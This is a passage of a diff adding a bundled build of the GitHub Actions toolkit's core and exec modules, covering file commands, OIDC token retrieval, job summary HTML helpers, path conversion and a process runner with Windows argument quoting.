${filePath}`); + } + fs.appendFileSync(filePath, `${utils_1.toCommandValue(message)}${os.EOL}`, { + encoding: 'utf8' + }); +} +exports.issueFileCommand = issueFileCommand; +function prepareKeyValueMessage(key, value) { + const delimiter = `ghadelimiter_${uuid_1.v4()}`; + const convertedValue = utils_1.toCommandValue(value); + // These should realistically never happen, but just in case someone finds a + // way to exploit uuid generation let's not allow keys or values that contain + // the delimiter. + if (key.includes(delimiter)) { + throw new Error(`Unexpected input: name should not contain the delimiter "${delimiter}"`); + } + if (convertedValue.includes(delimiter)) { + throw new Error(`Unexpected input: value should not contain the delimiter "${delimiter}"`); + } + return `${key}<<${delimiter}${os.EOL}${convertedValue}${os.EOL}${delimiter}`; +} +exports.prepareKeyValueMessage = prepareKeyValueMessage; +//# sourceMappingURL=file-command.js.map + +/***/ }), + +/***/ 8041: +/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { + +"use strict"; + +var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { + function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } + return new (P || (P = Promise))(function (resolve, reject) { + function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } + function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } + function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } + step((generator = generator.apply(thisArg, _arguments || [])).next()); + }); +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.OidcClient = void 0; +const http_client_1 = __nccwpck_require__(6255); +const auth_1 = __nccwpck_require__(5526); +const core_1 = __nccwpck_require__(2186); +class OidcClient { + static createHttpClient(allowRetry = true, maxRetry = 10) { + const requestOptions = { + allowRetries: allowRetry, + maxRetries: maxRetry + }; + return new http_client_1.HttpClient('actions/oidc-client', [new auth_1.BearerCredentialHandler(OidcClient.getRequestToken())], requestOptions); + } + static getRequestToken() { + const token = process.env['ACTIONS_ID_TOKEN_REQUEST_TOKEN']; + if (!token) { + throw new Error('Unable to get ACTIONS_ID_TOKEN_REQUEST_TOKEN env variable'); + } + return token; + } + static getIDTokenUrl() { + const runtimeUrl = process.env['ACTIONS_ID_TOKEN_REQUEST_URL']; + if (!runtimeUrl) { + throw new Error('Unable to get ACTIONS_ID_TOKEN_REQUEST_URL env variable'); + } + return runtimeUrl; + } + static getCall(id_token_url) { + var _a; + return __awaiter(this, void 0, void 0, function* () { + const httpclient = OidcClient.createHttpClient(); + const res = yield httpclient + .getJson(id_token_url) + .catch(error => { + throw new Error(`Failed to get ID Token. \n + Error Code : ${error.statusCode}\n + Error Message: ${error.message}`); + }); + const id_token = (_a = res.result) === null || _a === void 0 ? void 0 : _a.value; + if (!id_token) { + throw new Error('Response json body do not have ID Token field'); + } + return id_token; + }); + } + static getIDToken(audience) { + return __awaiter(this, void 0, void 0, function* () { + try { + // New ID Token is requested from action service + let id_token_url = OidcClient.getIDTokenUrl(); + if (audience) { + const encodedAudience = encodeURIComponent(audience); + id_token_url = `${id_token_url}&audience=${encodedAudience}`; + } + core_1.debug(`ID token url is ${id_token_url}`); + const id_token = yield OidcClient.getCall(id_token_url); + core_1.setSecret(id_token); + return id_token; + } + catch (error) { + throw new Error(`Error message: ${error.message}`); + } + }); + } +} +exports.OidcClient = OidcClient; +//# sourceMappingURL=oidc-utils.js.map + +/***/ }), + +/***/ 2981: +/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { + +"use strict"; + +var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); +}) : (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + o[k2] = m[k]; +})); +var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { + Object.defineProperty(o, "default", { enumerable: true, value: v }); +}) : function(o, v) { + o["default"] = v; +}); +var __importStar = (this && this.__importStar) || function (mod) { + if (mod && mod.__esModule) return mod; + var result = {}; + if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); + __setModuleDefault(result, mod); + return result; +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.toPlatformPath = exports.toWin32Path = exports.toPosixPath = void 0; +const path = __importStar(__nccwpck_require__(1017)); +/** + * toPosixPath converts the given path to the posix form. On Windows, \\ will be + * replaced with /. + * + * @param pth. Path to transform. + * @return string Posix path. + */ +function toPosixPath(pth) { + return pth.replace(/[\\]/g, '/'); +} +exports.toPosixPath = toPosixPath; +/** + * toWin32Path converts the given path to the win32 form. On Linux, / will be + * replaced with \\. + * + * @param pth. Path to transform. + * @return string Win32 path. + */ +function toWin32Path(pth) { + return pth.replace(/[/]/g, '\\'); +} +exports.toWin32Path = toWin32Path; +/** + * toPlatformPath converts the given path to a platform-specific path. It does + * this by replacing instances of / and \ with the platform-specific path + * separator. + * + * @param pth The path to platformize. + * @return string The platform-specific path. + */ +function toPlatformPath(pth) { + return pth.replace(/[/\\]/g, path.sep); +} +exports.toPlatformPath = toPlatformPath; +//# sourceMappingURL=path-utils.js.map + +/***/ }), + +/***/ 1327: +/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { + +"use strict"; + +var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { + function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } + return new (P || (P = Promise))(function (resolve, reject) { + function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } + function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } + function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } + step((generator = generator.apply(thisArg, _arguments || [])).next()); + }); +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.summary = exports.markdownSummary = exports.SUMMARY_DOCS_URL = exports.SUMMARY_ENV_VAR = void 0; +const os_1 = __nccwpck_require__(2037); +const fs_1 = __nccwpck_require__(7147); +const { access, appendFile, writeFile } = fs_1.promises; +exports.SUMMARY_ENV_VAR = 'GITHUB_STEP_SUMMARY'; +exports.SUMMARY_DOCS_URL = 'https://docs.github.com/actions/using-workflows/workflow-commands-for-github-actions#adding-a-job-summary'; +class Summary { + constructor() { + this._buffer = ''; + } + /** + * Finds the summary file path from the environment, rejects if env var is not found or file does not exist + * Also checks r/w permissions. + * + * @returns step summary file path + */ + filePath() { + return __awaiter(this, void 0, void 0, function* () { + if (this._filePath) { + return this._filePath; + } + const pathFromEnv = process.env[exports.SUMMARY_ENV_VAR]; + if (!pathFromEnv) { + throw new Error(`Unable to find environment variable for $${exports.SUMMARY_ENV_VAR}. Check if your runtime environment supports job summaries.`); + } + try { + yield access(pathFromEnv, fs_1.constants.R_OK | fs_1.constants.W_OK); + } + catch (_a) { + throw new Error(`Unable to access summary file: '${pathFromEnv}'. Check if the file has correct read/write permissions.`); + } + this._filePath = pathFromEnv; + return this._filePath; + }); + } + /** + * Wraps content in an HTML tag, adding any HTML attributes + * + * @param {string} tag HTML tag to wrap + * @param {string | null} content content within the tag + * @param {[attribute: string]: string} attrs key-value list of HTML attributes to add + * + * @returns {string} content wrapped in HTML element + */ + wrap(tag, content, attrs = {}) { + const htmlAttrs = Object.entries(attrs) + .map(([key, value]) => ` ${key}="${value}"`) + .join(''); + if (!content) { + return `<${tag}${htmlAttrs}>`; + } + return `<${tag}${htmlAttrs}>${content}`; + } + /** + * Writes text in the buffer to the summary buffer file and empties buffer. Will append by default. + * + * @param {SummaryWriteOptions} [options] (optional) options for write operation + * + * @returns {Promise} summary instance + */ + write(options) { + return __awaiter(this, void 0, void 0, function* () { + const overwrite = !!(options === null || options === void 0 ? void 0 : options.overwrite); + const filePath = yield this.filePath(); + const writeFunc = overwrite ? writeFile : appendFile; + yield writeFunc(filePath, this._buffer, { encoding: 'utf8' }); + return this.emptyBuffer(); + }); + } + /** + * Clears the summary buffer and wipes the summary file + * + * @returns {Summary} summary instance + */ + clear() { + return __awaiter(this, void 0, void 0, function* () { + return this.emptyBuffer().write({ overwrite: true }); + }); + } + /** + * Returns the current summary buffer as a string + * + * @returns {string} string of summary buffer + */ + stringify() { + return this._buffer; + } + /** + * If the summary buffer is empty + * + * @returns {boolen} true if the buffer is empty + */ + isEmptyBuffer() { + return this._buffer.length === 0; + } + /** + * Resets the summary buffer without writing to summary file + * + * @returns {Summary} summary instance + */ + emptyBuffer() { + this._buffer = ''; + return this; + } + /** + * Adds raw text to the summary buffer + * + * @param {string} text content to add + * @param {boolean} [addEOL=false] (optional) append an EOL to the raw text (default: false) + * + * @returns {Summary} summary instance + */ + addRaw(text, addEOL = false) { + this._buffer += text; + return addEOL ? this.addEOL() : this; + } + /** + * Adds the operating system-specific end-of-line marker to the buffer + * + * @returns {Summary} summary instance + */ + addEOL() { + return this.addRaw(os_1.EOL); + } + /** + * Adds an HTML codeblock to the summary buffer + * + * @param {string} code content to render within fenced code block + * @param {string} lang (optional) language to syntax highlight code + * + * @returns {Summary} summary instance + */ + addCodeBlock(code, lang) { + const attrs = Object.assign({}, (lang && { lang })); + const element = this.wrap('pre', this.wrap('code', code), attrs); + return this.addRaw(element).addEOL(); + } + /** + * Adds an HTML list to the summary buffer + * + * @param {string[]} items list of items to render + * @param {boolean} [ordered=false] (optional) if the rendered list should be ordered or not (default: false) + * + * @returns {Summary} summary instance + */ + addList(items, ordered = false) { + const tag = ordered ? 'ol' : 'ul'; + const listItems = items.map(item => this.wrap('li', item)).join(''); + const element = this.wrap(tag, listItems); + return this.addRaw(element).addEOL(); + } + /** + * Adds an HTML table to the summary buffer + * + * @param {SummaryTableCell[]} rows table rows + * + * @returns {Summary} summary instance + */ + addTable(rows) { + const tableBody = rows + .map(row => { + const cells = row + .map(cell => { + if (typeof cell === 'string') { + return this.wrap('td', cell); + } + const { header, data, colspan, rowspan } = cell; + const tag = header ? 'th' : 'td'; + const attrs = Object.assign(Object.assign({}, (colspan && { colspan })), (rowspan && { rowspan })); + return this.wrap(tag, data, attrs); + }) + .join(''); + return this.wrap('tr', cells); + }) + .join(''); + const element = this.wrap('table', tableBody); + return this.addRaw(element).addEOL(); + } + /** + * Adds a collapsable HTML details element to the summary buffer + * + * @param {string} label text for the closed state + * @param {string} content collapsable content + * + * @returns {Summary} summary instance + */ + addDetails(label, content) { + const element = this.wrap('details', this.wrap('summary', label) + content); + return this.addRaw(element).addEOL(); + } + /** + * Adds an HTML image tag to the summary buffer + * + * @param {string} src path to the image you to embed + * @param {string} alt text description of the image + * @param {SummaryImageOptions} options (optional) addition image attributes + * + * @returns {Summary} summary instance + */ + addImage(src, alt, options) { + const { width, height } = options || {}; + const attrs = Object.assign(Object.assign({}, (width && { width })), (height && { height })); + const element = this.wrap('img', null, Object.assign({ src, alt }, attrs)); + return this.addRaw(element).addEOL(); + } + /** + * Adds an HTML section heading element + * + * @param {string} text heading text + * @param {number | string} [level=1] (optional) the heading level, default: 1 + * + * @returns {Summary} summary instance + */ + addHeading(text, level) { + const tag = `h${level}`; + const allowedTag = ['h1', 'h2', 'h3', 'h4', 'h5', 'h6'].includes(tag) + ? tag + : 'h1'; + const element = this.wrap(allowedTag, text); + return this.addRaw(element).addEOL(); + } + /** + * Adds an HTML thematic break (
) to the summary buffer + * + * @returns {Summary} summary instance + */ + addSeparator() { + const element = this.wrap('hr', null); + return this.addRaw(element).addEOL(); + } + /** + * Adds an HTML line break (
) to the summary buffer + * + * @returns {Summary} summary instance + */ + addBreak() { + const element = this.wrap('br', null); + return this.addRaw(element).addEOL(); + } + /** + * Adds an HTML blockquote to the summary buffer + * + * @param {string} text quote text + * @param {string} cite (optional) citation url + * + * @returns {Summary} summary instance + */ + addQuote(text, cite) { + const attrs = Object.assign({}, (cite && { cite })); + const element = this.wrap('blockquote', text, attrs); + return this.addRaw(element).addEOL(); + } + /** + * Adds an HTML anchor tag to the summary buffer + * + * @param {string} text link text/content + * @param {string} href hyperlink + * + * @returns {Summary} summary instance + */ + addLink(text, href) { + const element = this.wrap('a', text, { href }); + return this.addRaw(element).addEOL(); + } +} +const _summary = new Summary(); +/** + * @deprecated use `core.summary` + */ +exports.markdownSummary = _summary; +exports.summary = _summary; +//# sourceMappingURL=summary.js.map + +/***/ }), + +/***/ 5278: +/***/ ((__unused_webpack_module, exports) => { + +"use strict"; + +// We use any as a valid input type +/* eslint-disable @typescript-eslint/no-explicit-any */ +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.toCommandProperties = exports.toCommandValue = void 0; +/** + * Sanitizes an input into a string so it can be passed into issueCommand safely + * @param input input to sanitize into a string + */ +function toCommandValue(input) { + if (input === null || input === undefined) { + return ''; + } + else if (typeof input === 'string' || input instanceof String) { + return input; + } + return JSON.stringify(input); +} +exports.toCommandValue = toCommandValue; +/** + * + * @param annotationProperties + * @returns The command properties to send with the actual annotation command + * See IssueCommandProperties: https://github.com/actions/runner/blob/main/src/Runner.Worker/ActionCommandManager.cs#L646 + */ +function toCommandProperties(annotationProperties) { + if (!Object.keys(annotationProperties).length) { + return {}; + } + return { + title: annotationProperties.title, + file: annotationProperties.file, + line: annotationProperties.startLine, + endLine: annotationProperties.endLine, + col: annotationProperties.startColumn, + endColumn: annotationProperties.endColumn + }; +} +exports.toCommandProperties = toCommandProperties; +//# sourceMappingURL=utils.js.map + +/***/ }), + +/***/ 1514: +/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { + +"use strict"; + +var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); +}) : (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + o[k2] = m[k]; +})); +var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { + Object.defineProperty(o, "default", { enumerable: true, value: v }); +}) : function(o, v) { + o["default"] = v; +}); +var __importStar = (this && this.__importStar) || function (mod) { + if (mod && mod.__esModule) return mod; + var result = {}; + if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); + __setModuleDefault(result, mod); + return result; +}; +var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { + function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } + return new (P || (P = Promise))(function (resolve, reject) { + function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } + function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } + function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } + step((generator = generator.apply(thisArg, _arguments || [])).next()); + }); +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.getExecOutput = exports.exec = void 0; +const string_decoder_1 = __nccwpck_require__(1576); +const tr = __importStar(__nccwpck_require__(8159)); +/** + * Exec a command. + * Output will be streamed to the live console. + * Returns promise with return code + * + * @param commandLine command to execute (can include additional args). Must be correctly escaped. + * @param args optional arguments for tool. Escaping is handled by the lib. + * @param options optional exec options. See ExecOptions + * @returns Promise exit code + */ +function exec(commandLine, args, options) { + return __awaiter(this, void 0, void 0, function* () { + const commandArgs = tr.argStringToArray(commandLine); + if (commandArgs.length === 0) { + throw new Error(`Parameter 'commandLine' cannot be null or empty.`); + } + // Path to tool to execute should be first arg + const toolPath = commandArgs[0]; + args = commandArgs.slice(1).concat(args || []); + const runner = new tr.ToolRunner(toolPath, args, options); + return runner.exec(); + }); +} +exports.exec = exec; +/** + * Exec a command and get the output. + * Output will be streamed to the live console. + * Returns promise with the exit code and collected stdout and stderr + * + * @param commandLine command to execute (can include additional args). Must be correctly escaped. + * @param args optional arguments for tool. Escaping is handled by the lib. + * @param options optional exec options. See ExecOptions + * @returns Promise exit code, stdout, and stderr + */ +function getExecOutput(commandLine, args, options) { + var _a, _b; + return __awaiter(this, void 0, void 0, function* () { + let stdout = ''; + let stderr = ''; + //Using string decoder covers the case where a mult-byte character is split + const stdoutDecoder = new string_decoder_1.StringDecoder('utf8'); + const stderrDecoder = new string_decoder_1.StringDecoder('utf8'); + const originalStdoutListener = (_a = options === null || options === void 0 ? void 0 : options.listeners) === null || _a === void 0 ? void 0 : _a.stdout; + const originalStdErrListener = (_b = options === null || options === void 0 ? void 0 : options.listeners) === null || _b === void 0 ? void 0 : _b.stderr; + const stdErrListener = (data) => { + stderr += stderrDecoder.write(data); + if (originalStdErrListener) { + originalStdErrListener(data); + } + }; + const stdOutListener = (data) => { + stdout += stdoutDecoder.write(data); + if (originalStdoutListener) { + originalStdoutListener(data); + } + }; + const listeners = Object.assign(Object.assign({}, options === null || options === void 0 ? void 0 : options.listeners), { stdout: stdOutListener, stderr: stdErrListener }); + const exitCode = yield exec(commandLine, args, Object.assign(Object.assign({}, options), { listeners })); + //flush any remaining characters + stdout += stdoutDecoder.end(); + stderr += stderrDecoder.end(); + return { + exitCode, + stdout, + stderr + }; + }); +} +exports.getExecOutput = getExecOutput; +//# sourceMappingURL=exec.js.map + +/***/ }), + +/***/ 8159: +/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { + +"use strict"; + +var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); +}) : (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + o[k2] = m[k]; +})); +var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { + Object.defineProperty(o, "default", { enumerable: true, value: v }); +}) : function(o, v) { + o["default"] = v; +}); +var __importStar = (this && this.__importStar) || function (mod) { + if (mod && mod.__esModule) return mod; + var result = {}; + if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); + __setModuleDefault(result, mod); + return result; +}; +var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { + function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } + return new (P || (P = Promise))(function (resolve, reject) { + function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } + function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } + function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } + step((generator = generator.apply(thisArg, _arguments || [])).next()); + }); +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.argStringToArray = exports.ToolRunner = void 0; +const os = __importStar(__nccwpck_require__(2037)); +const events = __importStar(__nccwpck_require__(2361)); +const child = __importStar(__nccwpck_require__(2081)); +const path = __importStar(__nccwpck_require__(1017)); +const io = __importStar(__nccwpck_require__(7436)); +const ioUtil = __importStar(__nccwpck_require__(1962)); +const timers_1 = __nccwpck_require__(9512); +/* eslint-disable @typescript-eslint/unbound-method */ +const IS_WINDOWS = process.platform === 'win32'; +/* + * Class for running command line tools. Handles quoting and arg parsing in a platform agnostic way. + */ +class ToolRunner extends events.EventEmitter { + constructor(toolPath, args, options) { + super(); + if (!toolPath) { + throw new Error("Parameter 'toolPath' cannot be null or empty."); + } + this.toolPath = toolPath; + this.args = args || []; + this.options = options || {}; + } + _debug(message) { + if (this.options.listeners && this.options.listeners.debug) { + this.options.listeners.debug(message); + } + } + _getCommandString(options, noPrefix) { + const toolPath = this._getSpawnFileName(); + const args = this._getSpawnArgs(options); + let cmd = noPrefix ? '' : '[command]'; // omit prefix when piped to a second tool + if (IS_WINDOWS) { + // Windows + cmd file + if (this._isCmdFile()) { + cmd += toolPath; + for (const a of args) { + cmd += ` ${a}`; + } + } + // Windows + verbatim + else if (options.windowsVerbatimArguments) { + cmd += `"${toolPath}"`; + for (const a of args) { + cmd += ` ${a}`; + } + } + // Windows (regular) + else { + cmd += this._windowsQuoteCmdArg(toolPath); + for (const a of args) { + cmd += ` ${this._windowsQuoteCmdArg(a)}`; + } + } + } + else { + // OSX/Linux - this can likely be improved with some form of quoting. + // creating processes on Unix is fundamentally different than Windows. + // on Unix, execvp() takes an arg array. + cmd += toolPath; + for (const a of args) { + cmd += ` ${a}`; + } + } + return cmd; + } + _processLineBuffer(data, strBuffer, onLine) { + try { + let s = strBuffer + data.toString(); + let n = s.indexOf(os.EOL); + while (n > -1) { + const line = s.substring(0, n); + onLine(line); + // the rest of the string ... + s = s.substring(n + os.EOL.length); + n = s.indexOf(os.EOL); + } + return s; + } + catch (err) { + // streaming lines to console is best effort. Don't fail a build. + this._debug(`error processing line. Failed with error ${err}`); + return ''; + } + } + _getSpawnFileName() { + if (IS_WINDOWS) { + if (this._isCmdFile()) { + return process.env['COMSPEC'] || 'cmd.exe'; + } + } + return this.toolPath; + } + _getSpawnArgs(options) { + if (IS_WINDOWS) { + if (this._isCmdFile()) { + let argline = `/D /S /C "${this._windowsQuoteCmdArg(this.toolPath)}`; + for (const a of this.args) { + argline += ' '; + argline += options.windowsVerbatimArguments + ? a + : this._windowsQuoteCmdArg(a); + } + argline += '"'; + return [argline]; + } + } + return this.args; + } + _endsWith(str, end) { + return str.endsWith(end); + } + _isCmdFile() { + const upperToolPath = this.toolPath.toUpperCase(); + return (this._endsWith(upperToolPath, '.CMD') || + this._endsWith(upperToolPath, '.BAT')); + } + _windowsQuoteCmdArg(arg) { + // for .exe, apply the normal quoting rules that libuv applies + if (!this._isCmdFile()) { + return this._uvQuoteCmdArg(arg); + } + // otherwise apply quoting rules specific to the cmd.exe command line parser. + // the libuv rules are generic and are not designed specifically for cmd.exe + // command line parser. + // + // for a detailed description of the cmd.exe command line parser, refer to + // http://stackoverflow.com/questions/4094699/how-does-the-windows-command-interpreter-cmd-exe-parse-scripts/7970912#7970912 + // need quotes for empty arg + if (!arg) { + return '""'; + } + // determine whether the arg needs to be quoted + const cmdSpecialChars = [ + ' ', + '\t', + '&', + '(', + ')', + '[', + ']', + '{', + '}', + '^', + '=', + ';', + '!', + "'", + '+', + ',', + '`', + '~', + '|', + '<', + '>', + '"' + ]; + let needsQuotes = false; + for (const char of arg) { + if (cmdSpecialChars.some(x => x === char)) { + needsQuotes = true; + break; + } + } + // short-circuit if quotes not needed + if (!needsQuotes) { + return arg; + } + // the following quoting rules are very similar to the rules that by libuv applies. + // + // 1) wrap the string in quotes + // + // 2) double-up quotes - i.e. " => "" + // + // this is different from the libuv quoting rules. libuv replaces " with \", which unfortunately + // doesn't work well with a cmd.exe command line. + // + // note, replacing " with "" also works well if the arg is passed to a downstream .NET console app. + // for example, the command line: + // foo.exe "myarg:""my val""" + // is parsed by a .NET console app into an arg array: + // [ "myarg:\"my val\"" ] + // which is the same end result when applying libuv quoting rules. although the actual + // command line from libuv quoting rules would look like: + // foo.exe "myarg:\"my val\"" + // + // 3) double-up slashes that precede a quote, + // e.g. hello \world => "hello \world" + // hello\"world => "hello\\""world" + // hello\\"world => "hello\\\\""world" + // hello world\ => "hello world\\" + // + // technically this is not required for a cmd.exe command line, or the batch argument parser. + // the reasons for including this as a .cmd quoting rule are: + // + // a) this is optimized for the scenario where the argument is passed from the .cmd file to an + // external program. many programs (e.g. .NET console apps) rely on the slash-doubling rule. + // + // b) it's what we've been doing previously (by deferring to node default behavior) and we + // haven't heard any complaints about that aspect. + // + // note, a weakness of the quoting rules chosen here, is that % is not escaped. in fact, % cannot be + // escaped when used on the command line directly - even though within a .cmd file % can be escaped + // by using %%. + // + // the saving grace is, on the command line, %var% is left as-is if var is not defined. this contrasts + // the line parsing rules within a .cmd file, where if var is not defined it is replaced with nothing. + // + // one option that was explored was replacing % with ^% - i.e. %var% => ^%var^%. this hack would + // often work, since it is unlikely that var^ would exist, and the ^ character is removed when the + // variable is used. the problem, however, is that ^ is not removed when %* is used to pass the args + // to an external program. + // + // an unexplored potential solution for the % escaping problem, is to create a wrapper .cmd file. + // % can be escaped within a .cmd file. + let reverse = '"'; + let quoteHit = true; + for (let i = arg.length; i > 0; i--) { + // walk the string in reverse + reverse += arg[i - 1]; + if (quoteHit && arg[i - 1] === '\\') { + reverse += '\\'; // double the slash + } + else if (arg[i - 1] === '"') { + quoteHit = true; + reverse += '"'; // double the quote + } + else { + quoteHit = false; + } + } + reverse += '"'; + return reverse + .split('') + .reverse() + .join(''); + } + _uvQuoteCmdArg(arg) { + // Tool runner wraps child_process.spawn() and needs to apply the same quoting as + // Node in certain cases where the undocumented spawn option windowsVerbatimArguments + // is used. + // + // Since this function is a port of quote_cmd_arg from Node 4.x (technically, lib UV, + // see https://github.com/nodejs/node/blob/v4.x/deps/uv/src/win/process.c for details), + // pasting copyright notice from Node within this function: + // + // Copyright Joyent, Inc. and other Node contributors. All rights reserved. + // + // Permission is hereby granted, free of charge, to any person obtaining a copy + // of this software and associated documentation files (the "Software"), to + // deal in the Software without restriction, including without limitation the + // rights to use, copy, modify, merge, publish, distribute, sublicense, and/or + // sell copies of the Software, and to permit persons to whom the Software is + // furnished to do so, subject to the following conditions: + // + // The above copyright notice and this permission notice shall be included in + // all copies or substantial portions of the Software. + // + // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + // IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + // FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + // AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + // LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING + // FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS + // IN THE SOFTWARE. + if (!arg) { + // Need double quotation for empty argument + return '""'; + } + if (!arg.includes(' ') && !arg.includes('\t') && !arg.includes('"')) { + // No quotation needed + return arg; + } + if (!arg.includes('"') && !arg.includes('\\')) { + // No embedded double quotes or backslashes, so I can just wrap + // quote marks around the whole thing. + return `"${arg}"`; + } + // Expected input/output: + // input : hello"world + // output: "hello\"world" + // input : hello""world + // output: "hello\"\"world" + // input : hello\world + // output: hello\world + // input : hello\\world + // output: hello\\world + // input : hello\"world + // output: "hello\\\"world" + // input : hello\\"world + // output: "hello\\\\\"world" + // input : hello world\ + // output: "hello world\\" - note the comment in libuv actually reads "hello world\" + // but it appears the comment is wrong, it should be "hello world\\" + let reverse = '"'; + let quoteHit = true; + for (let i = arg.length; i > 0; i--) { + // walk the string in reverse + reverse += arg[i - 1]; + if (quoteHit && arg[i - 1] === '\\') { + reverse += '\\'; + } + else if (arg[i - 1] === '"') { + quoteHit = true; + reverse += '\\'; + } + else { + quoteHit = false; + } + } + reverse += '"'; + return reverse + .split('') + .reverse() + .join(''); + } + _cloneExecOptions(options) { + options = options || {}; + const result = { + cwd: options.cwd || process.cwd(), + env: options.env || process.env, + silent: options.silent || false, + windowsVerbatimArguments: options.windowsVerbatimArguments || false, + failOnStdErr: options.failOnStdErr || false, + ignoreReturnCode: options.ignoreReturnCode || false, + delay: options.delay || 10000 + }; + result.outStream = options.outStream || process.stdout; + result.errStream = options.errStream || process.stderr; + return result; + } + _getSpawnOptions(options, toolPath) { + options = options || {}; + const result = {}; + result.cwd = options.cwd; + result.env = options.env; + result['windowsVerbatimArguments'] = + options.windowsVerbatimArguments || this._isCmdFile(); + if (options.windowsVerbatimArguments) { + result.argv0 = `"${toolPath}"`; + } + return result; + } + /** + * Exec a tool. + * Output will be streamed to the live console. + * Returns promise with return code + * + * @param tool path to tool to exec + * @param options optional exec options. See ExecOptions + * @returns number + */ + exec() { + return __awaiter(this, void 0, void 0, function* () { + // root the tool path if it is unrooted and contains relative pathing + if (!ioUtil.isRooted(this.toolPath) && + (this.toolPath.includes('/') || + (IS_WINDOWS && this.toolPath.includes('\\')))) { + // prefer options.cwd if it is specified, however options.cwd may also need to be rooted + this.toolPath = path.resolve(process.cwd(), this.options.cwd || process.cwd(), this.toolPath); + } + // if the tool is only a file name, then resolve it from the PATH + // otherwise verify it exists (add extension on Windows if necessary) + this.toolPath = yield io.which(this.toolPath, true); + return new Promise((resolve, reject) => __awaiter(this, void 0, void 0, function* () { + this._debug(`exec tool: ${this.toolPath}`); + this._debug('arguments:'); + for (const arg of this.args) { + this._debug(` ${arg}`); + } + const optionsNonNull = this._cloneExecOptions(this.options); + if (!optionsNonNull.silent && optionsNonNull.outStream) { + optionsNonNull.outStream.write(this._getCommandString(optionsNonNull) + os.EOL); + } + const state = new ExecState(optionsNonNull, this.toolPath); + state.on('debug', (message) => { + this._debug(message); + }); + if (this.options.cwd && !(yield ioUtil.exists(this.options.cwd))) { + return reject(new Error(`The cwd: ${this.options.cwd} does not exist!`)); + } + const fileName = this._getSpawnFileName(); + const cp = child.spawn(fileName, this._getSpawnArgs(optionsNonNull), this._getSpawnOptions(this.options, fileName)); + let stdbuffer = ''; + if (cp.stdout) { + cp.stdout.on('data', (data) => { + if (this.options.listeners && this.options.listeners.stdout) { + this.options.listeners.stdout(data); + } + if (!optionsNonNull.silent && optionsNonNull.outStream) { + optionsNonNull.outStream.write(data); + } + stdbuffer = this._processLineBuffer(data, stdbuffer, (line) => { + if (this.options.listeners && this.options.listeners.stdline) { + this.options.listeners.stdline(line); + } + }); + }); + } + let errbuffer = ''; + if (cp.stderr) { + cp.stderr.on('data', (data) => { + state.processStderr = true; + if (this.options.listeners && this.options.listeners.stderr) { + this.options.listeners.stderr(data); + } + if (!optionsNonNull.silent && + optionsNonNull.errStream && + optionsNonNull.outStream) { + const s = optionsNonNull.failOnStdErr + ? optionsNonNull.errStream + : optionsNonNull.outStream; + s.write(data); + } + errbuffer = this._processLineBuffer(data, errbuffer, (line) => { + if (this.options.listeners && this.options.listeners.errline) { + this.options.listeners.errline(line); + } + }); + }); 